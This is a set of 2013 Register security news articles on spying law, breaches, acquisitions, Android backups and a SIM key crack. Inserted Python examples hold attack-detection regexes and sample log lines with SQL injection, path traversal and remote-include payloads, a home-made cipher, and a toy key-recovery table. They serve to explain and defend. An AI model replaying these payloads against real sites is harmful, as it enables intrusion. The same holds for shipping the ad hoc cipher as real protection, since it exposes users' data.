STE WILLIAMS

New Kiwi spook law allows domestic prying


New Zealand’s Government Communications Security Bureau (GCSB), which illegally spied on resident Kim Dotcom, is on the cusp of gaining sweeping new powers that include wiretapping NZ citizens.

The GCSB’s domestic spying first came to light last year when it mistakenly tapped Dotcom’s communications, not realising that his residency status at the time meant its actions were illegal. Rather than punish the organisation for its domestic snooping blunders, the New Zealand government has spent some time steering new laws through parliament to increase the GCSB’s powers.

The legislation had been resisted by opposition parties until the leader of New Zealand’s United Future party Peter Dunne negotiated amendments to the bill. According to the New Zealand Herald, these include regular reviews of the GCSB and the country’s domestic spy agency, the SIS; annual declaration of how many times the GCSB makes its facilities available to local agencies; and annual reports of warrants issued against locals.

However, the capacity of the GCSB to spy on locals – the reason for opposition to it – remains intact.

With the United Future party agreeing to support the bill, it will now have the numbers to get through parliament.

InternetNZ has noted that the changes to the bill haven’t yet been formally documented and has received the mooted changes cautiously. The bill with the proposed amendments is to be returned to parliament later this week.

However, QC Rodney Harrison has criticised the changes as holding out “false hope” that the GCSB won’t abuse its spying powers. The NZ Herald says Harrison and Kim Dotcom are planning a protest meeting to rally resistance to the bill. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/07/24/kiwis_set_to_get_new_spook_law/

Top server host OVH warns of ‘multi-stage’ hacking attack


French-based server host OVH has warned that its systems have been penetrated in a multi-stage attack that leaves US and European customers at risk.

In an advisory on its forum board, the company warned that an attacker had gained control of a system administrator’s account, and used that to gain access to a VPN account of one of the firm’s backoffice staff. This was used to get the personal data of customers in Europe and from a hosting firm in Canada.

“Overall, in the coming months the back office will be under PCI-DSS which will allow us to ensure that the incident related to a specific hack on specific individuals will have no impact on our databases,” the company said.

“In short, we were not paranoid enough so now we’re switching to a higher level of paranoia. The aim is to guarantee and protect your data in the case of industrial espionage that would target people working at OVH.”

European customers’ surname, first name, nic, address, city, country, telephone, fax, and encrypted password are all open to the attackers, and customers of the firm’s Canadian hosting company have been advised to change SSH keys to ensure a secure connection.

The company is staying mum about what exact data has been scraped, but has filed a complaint about the issue to local judicial authorities.

This isn’t the first time OVH has suffered an attack. Back in May the company warned that its backoffice functions had been breached by hackers unknown and passwords were stolen. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/07/23/top_server_host_ovh_warns_of_multistage_hacking_attack/

E-shopkeepers stabbed with SQL needles ‘twice’ as much as other sites


Retailers suffer twice as many SQL injection attacks on their systems as other industries, according to a new study by data-centre security firm Imperva, which claims the ferocity of web-based assaults is growing.

The fourth annual edition of Imperva’s Web Application Attack Report [PDF] also revealed that e-shopping applications received “749 individual attack requests per attack campaign” on average.

SQL injections exploit vulnerabilities in software that does not correctly or sufficiently clean up user-submitted data, allowing hackers to (for example) hijack database searches to retrieve private information, alter sensitive data or execute arbitrary commands.

Online shops have plenty of goodies, namely customer credit card details, in their databases for hackers to swipe, which explains why they were disproportionately targeted by SQL probing, said Amichai Shulman, Imperva’s chief technology officer.

According to the report, the US kept its place as the number-one source of web attacks; the majority of requests and attackers originated in America, Western Europe, China and Brazil. While a typical attack lasted around five minutes, we’re told, the worst recorded incident lasted more than 15 hours. Most of the web apps surveyed by Imperva received four or more attacks per month.

“While most of the 70 web applications monitored were attacked a significant amount, some received an astounding number of attacks – with one application receiving up to an average of 26 per minute,” said Shulman.

“While these findings undeniably demonstrate that web application attacks are far from consistently distributed, the takeaway is that organizations should base security measures on the worst case scenario, not on the average case.”

Shulman told El Reg that hackers are setting up more and more automated assaults, and are therefore threatening a greater number of web-based applications.

Dwayne Melancon, chief technology officer at security tools vendor TripWire, said web stores have improved their information security policies after years of being hammered by hackers.

“Retailers have traditionally been attractive targets for cyber attacks because they have widely distributed networks, they handle payment data, and many of them have taken a ‘bare minimum’ approach when it comes to funding information security,” Melancon claimed.

“Thankfully, this is beginning to change as retail executives see the negative impact that data breaches can have on repeat sales customer relationships.”

Imperva’s study involved matching events to known attack signatures, comparing attack sources to blacklists of malicious hosts, and reviewing specific attributes of malicious traffic. The report aims to paint a comprehensive picture of the web attack threat landscape by outlining the frequency, type and geographical origin of each attack. The result is a study that Imperva hopes will help security professionals prioritise their vulnerability remediation efforts.

The study focused on looking at six types of web application attack: SQL injection, remote file inclusion, local file inclusion, directory traversal, cross-site scripting, email extraction and comment spamming. Logs from six months of attacks against Imperva’s customers were used to compile the final report, published on Tuesday. ®
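As an added illustration of the signature-and-blacklist method described above (example code written for this page, not Imperva’s), the following Python classifies web-server log lines into the report’s attack categories after URL-decoding each request, and tallies hits per category and per source host. The signatures, the blocklist entry and the log lines are all constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Signatures for the attack categories the report names. The patterns, the
# blocklist and the log lines are constructed for this example; they are not
# Imperva's signatures or data.
SIGNATURES = {
    "sql_injection": re.compile(r"union\s+select|;\s*drop\s+table|'\s*or\s+\d+\s*=\s*\d+", re.I),
    "remote_file_inclusion": re.compile(r"[?&]\w+=(https?|ftp)://", re.I),
    "local_file_inclusion": re.compile(r"/etc/passwd|php://|file://", re.I),
    "directory_traversal": re.compile(r"\.\./|\.\.\\"),
    "cross_site_scripting": re.compile(r"<script|javascript:|on(error|load)\s*=", re.I),
    "email_extraction": re.compile(r"EmailSiphon|EmailCollector|ExtractorPro", re.I),
    "comment_spam": re.compile(r"^POST \S*/comment", re.I),
}

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Stand-in for the malicious-host blacklists the report matched sources
# against (constructed; RFC 5737 documentation address).
BLOCKLIST = {"198.51.100.23"}


def classify(line):
    """Return the source, matched categories and blocklist status of one log
    line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    # Decode before matching: payloads arrive URL-encoded, and a signature
    # that only ever sees "UNION%20SELECT" misses them.
    request = unquote_plus(m["req"])
    haystack = request + " " + m["ua"]
    categories = [name for name, rx in SIGNATURES.items() if rx.search(haystack)]
    return {"ip": m["ip"], "categories": categories, "blocklisted": m["ip"] in BLOCKLIST}


def summarise(lines):
    """Count hits per attack category and malicious requests per source host,
    the two views the report is built from."""
    by_category, by_source = Counter(), Counter()
    for line in lines:
        result = classify(line)
        if result is None:
            continue
        for name in result["categories"]:
            by_category[name] += 1
        if result["categories"] or result["blocklisted"]:
            by_source[result["ip"]] += 1
    return by_category, by_source


# Constructed log lines; addresses are from the RFC 5737 documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [23/Jul/2013:10:01:02 +0000] "GET /products?search=shoes HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [23/Jul/2013:10:01:09 +0000] "GET /products?search=%27+UNION+SELECT+card_number+FROM+customers-- HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [23/Jul/2013:10:02:41 +0000] "GET /include.php?page=http://203.0.113.99/x.txt HTTP/1.1" 404 210 "-" "curl/7.30"',
    '192.0.2.77 - - [23/Jul/2013:10:03:15 +0000] "GET /download?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 403 0 "-" "python-requests/1.2"',
    '192.0.2.78 - - [23/Jul/2013:10:04:02 +0000] "GET /search?q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1" 200 3000 "-" "Mozilla/5.0"',
    '203.0.113.40 - - [23/Jul/2013:10:05:30 +0000] "GET /contact HTTP/1.1" 200 1400 "-" "EmailSiphon"',
    '198.51.100.23 - - [23/Jul/2013:10:06:12 +0000] "POST /blog/comment HTTP/1.1" 302 0 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    by_category, by_source = summarise(SAMPLE_LOG)
    print("hits per category:", dict(by_category))
    print("malicious requests per source:", dict(by_source))
```

The traversal line deliberately matches two categories at once, which is how real signature sets behave; a report that counts per category, as this one does, counts it twice.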


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/07/23/imperva_web_app_threat_survey/

Cisco coughs $2.7bn for Sourcefire


Cisco has dug deep and found $2.7bn for intrusion prevention security player Sourcefire.

Sourcefire started out in intrusion detection/intrusion prevention but expanded over the years to add next-generation firewall and advanced malware protection wares to its portfolio.

Cisco reckons the acquisition will accelerate the delivery of its security strategy of “defending, discovering, and remediating the most critical threats”.

It also claimed industry developments such as mobility, the cloud and extending net connectivity to a vast new range of devices (the so-called ‘Internet of Everything’) are changing the security landscape, forcing a new approach that the Cisco/Sourcefire combo hopes to bring to the table.

“Traditional disparate products [are] insufficient to protect organizations from dynamic threats,” Cisco claimed.

The duo hope to offer “advanced security threat protection across the entire attack continuum and from any device to any cloud”.

The deal is the biggest in the information security industry since Intel bought McAfee three years ago for $7.68 billion.

Under the terms of the deal, Cisco is offering $76 per share in cash in exchange for each share of Sourcefire, a premium of around 28 per cent on Monday’s closing price of $59.08.

Sourcefire was founded by Martin Roesch, the creator of Snort, a popular open-source intrusion detection engine, back in 2001. The firm previously accepted a $225 million takeover bid from Check Point way back in 2005, but the Israeli firm withdrew its offer after it became clear that US legislators were lining up to block the acquisition. Sourcefire’s technology played a key part in protecting US infrastructure systems and US politicians were wary about seeing control of this technology pass to an Israeli firm.

Two years later, Sourcefire went public raising $86.3 million in the process. Sourcefire rejected a $187 million offer from security and storage appliance vendor Barracuda Networks in May 2008.

For the year ending 31 December 2012, Sourcefire reported revenue of $223.1 million, an increase of 35 per cent year-on-year. The company is based in Columbia, MD and employs 650 people worldwide.

Cisco’s acquisition of Sourcefire gives it extra ammunition in its fight against competitors such as Check Point, Symantec, Juniper and McAfee/Intel in the security appliances and services market. It also boosts its tech line-up against system vendors such as IBM and HP.

Clive Longbottom of industry analysts Quocirca said buying Sourcefire bolsters Cisco’s ability to deliver complete systems, not just networking components.

“Cisco wants to ‘own’ the whole stack, and Sourcefire bolsters its capabilities on the security front,” Longbottom said.

“Building this into UCS [Unified Computing System] would definitely give a better ongoing engineered system to continue playing against the VCE V-Blocks, IBM PureSystems and Dell V-Starts and so on. It may also provide better capabilities straight into its switches – but this could mean messing with IOS to ensure that the security worked at line speed.”

Cisco will have to align Sourcefire’s technologies against the push towards Software Defined Networking, which is changing the shape of data centres, according to Longbottom.

“SDN is coming along,” Longbottom argued. “The idea here is to take all the smarts out from the switch and move it to commodity servers. Therefore, instead of each switch being stand-alone intelligent (and falling out when updates are applied at different levels across the switches), a higher-level management system is put in place that works across the whole switch estate, rather than one at a time. This makes applying network policies and dealing with network traffic issues far ‘cleaner’.”

“Cisco has said that it will adopt SDN using OpenFlow – but we have yet to see how ‘standard’ this will be. My view is that we will end up with a hybrid system of some functions being dealt with via an SDN layer, but some stuff will still be dealt with via ASICs and FPGAs and code in the switches themselves.”

“Sourcefire could find that a lot of what is there moves up to the SDN level – in which case it becomes swap outable for another vendor’s software. What Cisco may do is embed bits of Sourcefire capabilities into UCS and into certain switches where maximum packet performance is required and provide it as an offering for those who want standard switches but a total Cisco network management approach. In some cases, Cisco will just accept that the user will choose a different systems/network management tool with its own OpenFlow SDN capabilities,” he added. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/07/23/cisco_buys_sourcefire/

Ubuntuforums.org cracker promises no password release

He’s still a tool – and I’m being polite here – for doing what he did. For pity’s sake, it’s not like Ubuntu are a third world despotic nation, hell bent on subjugating native tribes with WMD, is it? No, they work as volunteers to release a fairly effective FREE alternative to Windows, iOS, et al, which is used by millions (well, tens of thousands, anyhow) around the globe. And this spotty-faced git decides, on a whim, to upset the apple cart and screw them over? Doesn’t bloody matter if he’s not going to use the passwords. Doesn’t matter much if they were salted, peppered, or covered in tomato sauce: He was wrong to do what he did. End of.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/07/23/ubuntuforums_cracker_promises_no_password_release/

Tango down! Chat app millions ransacked by pro-Assad hacktivists


Hacktivists loyal to Syria’s president Bashar al-Assad claim to have extracted 1.5TB of sensitive data from chat app Tango.

The Syrian Electronic Army, best known for hacking into the official Twitter feeds of the Associated Press and The Guardian, boasted it swiped the mobile numbers and contact details of millions of users of the popular messaging and gaming platform:

The Syrian Electronic Army [SEA] hacked the Tango app (video/text messages service) website and database. The databases content a of millions of the app users phone numbers and contacts and their emails More than 1,5 TB of the daily-backups of the servers network has been downloaded successfully.

SEA posted screenshots (here and here) to back up its claims. “Much of the information in the databases that were downloaded will be delivered to the Syrian government,” it said.

eHackingnews, which broke the story, reported that Tango was hit thanks to a vulnerable WordPress installation, based on screenshots of the hack supplied by the SEA.

Tango confirmed it had suffered an intrusion via updates to its official Twitter feed on Saturday.

“Tango experienced a cyber intrusion that resulted in unauthorized access to some data. We are working on increasing our security systems,” it said, adding “We sincerely apologize for any inconvenience this breach may have caused our members.”

Tango’s blog is unreachable and its main website resolves to its official Facebook page at the time of writing on Monday. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/07/23/tango_chat_smackdown/

Symantec snaps up PasswordBank, touts SSO logins to biz


Symantec has bought enterprise-focused authentication software start-up PasswordBank in a move aimed at beefing up its enterprise security software roster.

PasswordBank provides identity-as-a-service through enterprise and cloud-based single sign on services, as well as a line of multi-factor authentication-as-a-service technologies. The Spanish startup has said nothing about the deal on either its site or infrequently updated blog.

However, Symantec confirmed its purchase of PasswordBank, first rumoured over the weekend, via a brief statement in response to El Reg‘s inquiries on the matter. Financial terms of the deal, revealed on Monday, remain unconfirmed.

Symantec has acquired PasswordBank, a company with less than 20 employees based in Barcelona, Spain. PasswordBank is an independent provider of multifactor authentication, single sign on (SSO) and user management services.

Symantec will use PasswordBank’s expertise in single sign on technology to extend Symantec’s functionality in secure sign on for web or cloud applications and further enhance its identity and context aware security, a key strategic initiative. Symantec is not disclosing any other details about this deal at this time.

Single sign-on (SSO) technology has been a philosopher’s stone for segments of the security industry for years because it offers the promise of drastically reducing the number of passwords that enterprise users must remember, drastically reducing the burden on help-desks in the process. The technology can be delivered through either appliances or services.

In practice, SSO offers a way to reduce the number of passwords corporates are obliged to manage, but it doesn’t achieve the one-password-to-rule-them-all goal the marketing hype around the technology promises. So say IT directors at large enterprises El Reg spoke to about the subject. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/07/23/symantec_passwordbank_purchase/

Oi, Google, you ate all our Wi-Fi keys


Privacy experts have urged Google to allow Android users to encrypt their backups in the wake of the NSA PRISM surveillance flap.

The useful “back up my data” option in Google’s Android operating system sends a lot of private information from fandroids’ devices to Google’s cloud storage service. Such sensitive data includes wireless network passwords, application files and configuration settings.

These backed-up bytes are probably stored in an encrypted form on the advertising giant’s servers. However, if it is encrypted, then it’s Google that has the decryption keys, not the person or organisation that owns the data. As such, the information is vulnerable to secret demands from government agents and cops for that data.

If users held the cryptographic keys themselves, then at least they would be aware of any surveillance request and would have a chance of personally fighting it.

Micah Lee – a staff technologist at privacy warrior outfit the Electronic Frontier Foundation and the maintainer of HTTPS Everywhere – argues that encrypted backups should be available. He outlined his wishes in a recent post to the Android Open Source Project.

“The ‘back up my data’ option in Android is very convenient. However it means sending a lot of private information, including passwords, in plaintext to Google. This information is vulnerable to government requests for data,” Lee writes.

Backup data is already encrypted in transit (just like secure web traffic) so it cannot be intercepted by any old miscreant – but users don’t have control over the encryption keys to their private data when at rest in Google’s machines, a situation Lee would like to see changed.

“You could implement this the same way Chrome’s sync feature is implemented, with two options: encrypt synced passwords with your Google credentials and encrypt all synced data with your own sync passphrase,” Lee argues.

“Since backup and restore is such a useful feature, and since it’s turned on by default, it’s likely that the vast majority of Android users are syncing this data with their Google accounts. Because Android is so popular, it’s likely that Google has plaintext wifi passwords for the majority of password-protected wifi networks in the world,” he adds.

Other security experts echo Lee’s concerns.

“[The data is] not encrypted in the sense of being inaccessible to anyone except you,” explains security industry veteran Paul Ducklin in a post on Sophos’s Naked Security blog. “That’s obvious because, as a comment on Micah’s posting pointed out, you can recover your data from Google even after you’ve wiped (or lost) your device, or changed your Google account password.”

“In other words, Google can unilaterally recover the plaintext of your Wi-Fi passwords, precisely so it can return those passwords to you quickly and conveniently even if you forget your device password and have to start over,” he added.

The list of Wi-Fi networks and passwords stored on a device is likely to extend far beyond a user’s home, and include hotels, shops, libraries, friends’ houses, offices and all manner of other places. Add this information to the extensive maps of Wi-Fi access points built up over years by Google and others, and suddenly fandroids face a greater risk to their privacy if this data is scrutinised by outside agents.

“The solution is to encrypt everything ‘for your eyes only’ before you back it up anywhere, especially into the cloud,” Ducklin concludes.
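To make concrete the difference between the two designs Lee and Ducklin describe, here is an added Python model (not Google’s or Chrome’s code): a provider-keyed backup, which the provider can restore after a password reset and can therefore also read, beside a passphrase-keyed one in which the provider holds only a salt and ciphertext. The cipher is HMAC-SHA256 as a counter-mode keystream with an encrypt-then-MAC tag, standing in for AES-GCM because only the standard library is assumed; the class and function names are the example’s own.

```python
import hashlib
import hmac
import secrets

NONCE_LEN, TAG_LEN = 16, 32


def _keystream(key, nonce, length):
    # HMAC-SHA256 in counter mode, used as a PRF stream; stands in for AES
    # because only the standard library is assumed here.
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def _subkeys(key):
    enc_key = hmac.new(key, b"enc", hashlib.sha256).digest()
    mac_key = hmac.new(key, b"mac", hashlib.sha256).digest()
    return enc_key, mac_key


def encrypt(key, plaintext):
    """Encrypt-then-MAC: returns nonce || ciphertext || tag."""
    enc_key, mac_key = _subkeys(key)
    nonce = secrets.token_bytes(NONCE_LEN)
    stream = _keystream(enc_key, nonce, len(plaintext))
    ciphertext = bytes(p ^ k for p, k in zip(plaintext, stream))
    tag = hmac.new(mac_key, nonce + ciphertext, hashlib.sha256).digest()
    return nonce + ciphertext + tag


def decrypt(key, blob):
    """Verify the tag first; a wrong key or a tampered blob raises ValueError."""
    enc_key, mac_key = _subkeys(key)
    nonce, ciphertext, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(mac_key, nonce + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("authentication failed: wrong key or tampered backup")
    stream = _keystream(enc_key, nonce, len(ciphertext))
    return bytes(c ^ k for c, k in zip(ciphertext, stream))


class ProviderKeyedBackup:
    """The design Ducklin infers from Android's behaviour: the provider holds
    the key, so it can restore after an account password reset, and can also
    read the data for itself or for anyone who compels it to."""

    def __init__(self):
        self._provider_key = secrets.token_bytes(32)  # never leaves the provider
        self._blobs = {}

    def upload(self, account, data):
        self._blobs[account] = encrypt(self._provider_key, data)

    def restore(self, account):
        # Account authentication is all the user supplies; no user-held secret.
        return decrypt(self._provider_key, self._blobs[account])

    def provider_view(self, account):
        # What the provider can hand over on request: the plaintext.
        return decrypt(self._provider_key, self._blobs[account])


class PassphraseKeyedBackup:
    """Lee's proposal: the key is derived from a sync passphrase the provider
    never sees, so the provider stores only a salt and ciphertext."""

    ITERATIONS = 100_000

    def __init__(self):
        self._store = {}

    @classmethod
    def _derive_key(cls, passphrase, salt):
        return hashlib.pbkdf2_hmac("sha256", passphrase.encode(), salt, cls.ITERATIONS)

    def upload(self, account, passphrase, data):
        salt = secrets.token_bytes(16)
        self._store[account] = (salt, encrypt(self._derive_key(passphrase, salt), data))

    def restore(self, account, passphrase):
        salt, blob = self._store[account]
        return decrypt(self._derive_key(passphrase, salt), blob)  # ValueError on a wrong passphrase

    def provider_view(self, account):
        # Salt and ciphertext only: nothing here decrypts without the passphrase.
        return None


# Constructed sample of the kind of record the "back up my data" option sends.
WIFI_BACKUP = b'{"ssid":"HomeNet","psk":"example-only-not-a-real-key"}'
```

The trade-off Lee accepts is visible in the second class: forget the passphrase and the provider cannot help, because a reset gives it nothing to decrypt with.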

In a statement, Google said the backup feature is optional and built to be secure. Although a debate on the feature continues on the Android developer forum, Google didn’t seem convinced about the need for any changes:

Our optional ‘Backup my data’ feature makes it easier to switch to a new Android device by using your Google Account and password to restore some of your previous settings. This helps you avoid the hassle of setting up a new device from scratch.

At any point, you can disable this feature, which will cause data to be erased. This data is encrypted in transit, accessible only when the user has an authenticated connection to Google and stored at Google data centers, which have strong protections against digital and physical attacks.

Lee concedes that by using an operating system developed by Google that users are extending a fair degree of trust to the Chocolate Factory. His point is not that that trust shouldn’t extend to Wi-Fi passwords: at the very least, users should be given a choice.

“While using Android requires a certain amount of trusting Google, I don’t think it’s rational to expect users to trust Google with their plaintext passwords when Google can be compelled to give this data to the US government when they request it,” Lee concludes. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/07/23/google_wlan_password_backup_flap/

Phantom apps appear in Chinese fanbois’ iTunes accounts


Chinese fanbois are reporting that mobile apps they didn’t buy have started appearing in their iTunes accounts, leading to speculation an app promotion company may be illegally accessing accounts.

The scale of the problem is unclear at this stage but it’s been enough to persuade staff at popular local app forum iApps to investigate, according to TechInAsia.

The team discovered that many of the apps found by users (which they hadn’t purchased) were local mobile games that now enjoy high rankings on Apple’s charts.

iApps speculated that this could be the work of an unscrupulous promotion company somehow accessing accounts and downloading those apps it had been paid to promote.

The site claimed it may have been able to do this if the handsets were jailbroken, or possibly thanks to third party synchronisation tools which gather Apple ID info.

Both are pretty popular among Chinese fanbois and certainly some of those who found the phantom apps in their iTunes revealed that they had jailbroken their handsets – a strategy not recommended by Cupertino.

A third possible explanation is that these users have shared their Apple ID with friends and family – again a relatively common practice in China.

Apple didn’t have any official comment to make when contacted by El Reg.

The news comes just days after Apple was forced to close its Developer Centre website after worries it was being hacked.

However, the two incidents are unlikely to be linked, given that Turkish security researcher Ibrahim Balic has now publicly claimed it was he who attacked the site in order to report security bugs in the system. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/07/23/china_itunes_phantom_app_downloads/

Mobe SIM crypto hijack threatens millions: Here’s HOW IT WORKS


Analysis: A German researcher reckons he can take control of your phone’s SIM card and hijack the handset by cracking the encryption on the device.

But he’s not alone: network operators have long been able to do just that, and a careful look at how that’s possible makes the long-standing security of GSM phone networks all the more remarkable.


GSM networks are secured by shared secrets. A unique cryptographic key is issued to each subscriber and embedded in their phone’s SIM card; a copy of that key is held by the network allowing mutual authentication by symmetric encryption (the same key is used at both ends).

Despite successful assaults on other parts of the GSM infrastructure those private keys have remained beyond the grasp of hackers, at least until now.

Pedigree security researcher Karsten Nohl has apparently discovered two unrelated flaws in implementations of the GSM standard that (when combined) could leave millions of SIM cards vulnerable to attack. Such attacks could permit call interception, and threaten the security of NFC applications (such as pay by wave) just as the tech is on the cusp of going mainstream.

Getting the secret key off a SIM isn’t easy – but increases in computing power have combined with poor implementations to create the first flaw exploited by Nohl, which reveals the secret key that should be known only to the network operator and the SIM.

Nohl’s crack uses an SMS message addressed to the SIM, and unseen by the user. This is normal enough; SIM messages come in four classes (0-3) addressed to the user, the handset, the SIM, and a tethered device respectively. Class 0 is the one we all know and love, but Class 2 (addressed to the SIM) remains surprisingly popular even if the other classes are all but forgotten.

The most common Class 2 message contains changes to the list of preferred roaming partners, to reflect new deals between operators, but the Global Platform standard permits anything, even the entire operating system, to be changed using signed Class 2 messages.

Such radical updates are rare, but they have happened and are secured using that shared secret, so knowledge of the key confers significant power.

This should already be setting off alarm bells

Nohl’s crack starts with a malformed Class 2 message. Anyone can send such a message using a software SMS Centre (SMSC), or even an old handset, as some permitted a user-selected class. That message is rejected by the receiving SIM because it is not signed. Usually the message is simply discarded, but some SIMs apparently respond with a digitally signed error message that can be used to reveal their secret key.

Digital signatures shouldn’t reveal the keys used to sign them; that would defeat the object, but in this case it seems that some do.

The digital signature sent over with the error message is a keyed one-way hash: a fixed-length summary of the message that is generated using the secret key. Anyone who holds the key can recalculate the hash over the received message; if it matches the hash included with the message, then the received data can be verified as genuine and trustworthy.

But Nohl’s team used a rainbow table to deduce the key from the signature.

The error message is a standard one – it doesn’t change between handsets – so by running through every possible key value, a rainbow table of every possible hash value can be calculated for this one particular message. An attacker simply takes the signature from the phone and looks it up in the rainbow table to discover the secret key.

Every bit of a key doubles the size of the rainbow table, and such techniques rapidly become impractical as keys get bigger, but some older SIMs are using 56-bit keys and old-style DES encryption which combines to make the rainbow technique viable, and where that happens the secret key can be quickly discovered.

Once you have the key, you can start signing your own command SMS messages to control a targeted mobile.
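An added toy model of the weakness just described (not Nohl’s code, and not the real OTA protocol): a SIM that answers an unsigned request with a signed, fixed error lets a precomputed table of signature-to-key pairs give up its key, while one that discards the message silently gives nothing to look up. A truncated HMAC-SHA256 stands in for the DES-based signature and the key space is cut to 16 bits so the table builds in well under a second; the error string and function names are the example’s own.

```python
import hashlib
import hmac

KEY_BITS = 16  # toy key size so the table builds instantly; single DES uses 56
FIXED_ERROR = b"OTA: command rejected, bad signature"  # constructed stand-in for the SIM's standard error


def sign(key_value, message, key_bits=KEY_BITS):
    """Truncated HMAC-SHA256 standing in for the SIM's DES-based signature."""
    key = key_value.to_bytes((key_bits + 7) // 8, "big")
    return hmac.new(key, message, hashlib.sha256).digest()[:8]


def leaky_sim(secret_key, unsigned_request):
    """The behaviour that exposes the key: answer with a *signed* fixed error."""
    return sign(secret_key, FIXED_ERROR)


def silent_sim(secret_key, unsigned_request):
    """The hardened behaviour: discard the unsigned message and say nothing."""
    return None


def build_lookup_table(message, key_bits=KEY_BITS):
    """Signature -> key for one fixed message over the whole key space. With
    the message fixed, this plain table is what the rainbow table reduces to."""
    return {sign(k, message, key_bits): k for k in range(1 << key_bits)}


def recover_key(reply, table):
    """One dictionary lookup does the work once the table exists."""
    if reply is None:
        return None  # a silent SIM gives the attacker nothing to look up
    return table.get(reply)


def table_entries(key_bits):
    """Each extra key bit doubles the table; 2**56 entries is what single DES
    asks of an attacker, and the article says some SIMs still use it."""
    return 1 << key_bits
```

Both defences the article points at are visible here: the silent SIM removes the signed reply the table is indexed by, and a longer key makes the table itself unbuildable.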

What can be done?

Operators can change the SIMs, and update the encryption, but users are surprisingly reluctant to slot a new SIM into their handsets – they become quite emotional about it, proud to be using decades-old chippery, which stalls upgrade programmes. It’s also expensive – adding a dollar to the cost of the SIM may seem like a small deal, but when a network has 10 million customers it becomes a significant expense.

Quite how many SIMs are using 56DES we don’t know; Nohl reckons to have tried a thousand over the last year or two and discovered a quarter are vulnerable. There’s no easy way to discover if a specific SIM is using 56DES: the operators store the information along with the keys, but the SIM won’t talk about the subject.

Armed with a key our miscreant can reprogram the SIM to do just about anything – redirect SMS messages, change the preferred network operator, run up enormous bills to premium-rate numbers and authenticate payments through services such as PayForIt. Modern SIMs can request an internet connection, furnished by the handset and generally without user interaction, through which our attacker can cause all sorts of mischief – though to get at the users’ bank details he’ll need Nohl’s second flaw.

Almost all SIMs (and credit cards) use JavaCard, a relation of Java still owned by Oracle, but having little in common with the cross-platform interpreted language beyond a bit of syntax. JavaCard is an operating system, not a language, and one which keeps applications (Cardlets, in the parlance) separated so they can’t talk to each other.

Nohl claims to have found a flaw in that separation, though he won’t be making the details public until next month’s Black Hat conference. Combining that flaw with possession of the secret key makes for a potent combination – pay-by-bonk applications, such as the one being launched by EE later this year, rely on the hitherto sacrosanct separation of JavaCard apps, so there’ll be a good deal of interest in Nohl’s talk from hat wearers of all colours.

GSM authentication, as opposed to encryption, has proved amazingly resilient over the years. A fix for this problem will likely turn up pretty quickly, with the ITU and GSMA falling over themselves to be associated with the solution, but if it needs replacement SIMs then that will be a longer process.

Operators should be quick to send out new SIM cards to customers still using 56DES, but the JavaCard vulnerability may prove harder to patch and we’ll get you details of that just as soon as we can. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/07/22/mobile_gsm_sim_card_crypto_crack/